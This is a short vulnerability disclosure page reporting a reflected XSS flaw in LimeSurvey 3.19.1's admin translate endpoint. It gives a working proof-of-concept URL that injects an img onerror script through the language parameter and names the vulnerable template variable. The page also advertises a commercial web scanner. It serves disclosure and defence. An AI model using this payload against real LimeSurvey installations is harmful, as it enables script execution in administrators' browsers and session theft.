Skip to content

Reflected XSS in LimeSurvey 3.19.1 by xcuter

kbgsft edited this page May 24, 2020 · 6 revisions

1. Summary

A Reflected-XSS vulnerability has been descoverd in LimeSurvey by xcuter

2. Payloads

http://xxxxxx.com/limesurvey/index.php/admin/translate/sa/index/surveyid/336819/lang/en'<xss_start><img src=1 onerror=alert('vulnerable')>

3. Images

  • Proof

  • Response html SourceCode

  • Vulnerable PHP Code

    {$tolang} in line 6 is vulnerable.

4. How to find this vulnerability?

The "Web Security Checker" automatically diagnoses vulnerabilities in Web services. It can diagnose the following vulnerabilities : SQL Injection, XSS, LFI, RFI, SSRF, File Upload, File Download, XXE, Command Injection, File management, Direcroty Listing, Source Code Disclosure, URL Redirection, Insecure SSL/TLS, Mixed Content, Specific Vulnerabilities(CVE ShellShock, etc.)

https://www.ncloud.com/product/security/webSecurityChecker

5. Discoverer

  • Kang Bong Goo( xcuter ) in NBP( NAVER BUSINESS PLATFORM )
  • Security Engineer